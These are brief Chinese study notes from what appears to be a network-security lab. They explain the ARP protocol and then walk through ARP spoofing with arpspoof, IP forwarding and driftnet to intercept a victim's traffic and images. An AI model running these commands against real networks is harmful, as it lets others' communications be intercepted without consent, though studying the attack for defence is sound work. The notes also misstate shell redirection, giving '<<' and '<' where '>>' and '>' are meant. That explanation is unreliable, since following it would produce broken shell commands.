目录


ARP请求,因为不知道目的mac地址,所以广播,用全0来填充
ARP响应是单播形式

格式
opcode 1:请求,2:响应
cmd:arp -a查看arp缓存 arp -d清除缓存


2、欺骗主机
arp静态绑定,arp防火墙
kali :
apt-get install dsniff
arpspoof -i eth0(自己网卡名) -t 目标ip 目标网关
目标机此时不能上网了,用wiresharke抓取目标机器的流量,发现出现多次arp相应,于是判断可能出现了arp攻击。

设置自动转发
echo 1 >> /proc/sys/net/ipv4/ip_forward
然后发现被攻击主机仍然可以上网 ,但是仍然出现大量arp相应

echo用法:
echo 新内容 << 在原有的内容后面增加新内容
echo 新内容 < 将原来的内容全部删除,然后将新内容写进
此时,用kali的wireshark抓包,可以看到kali机抓到了windows10访问百度时发出的包,此时目的mac为kali的mac

apt-get install driftnet, driftnet -i eth0
抓取目标机上网时的明文图片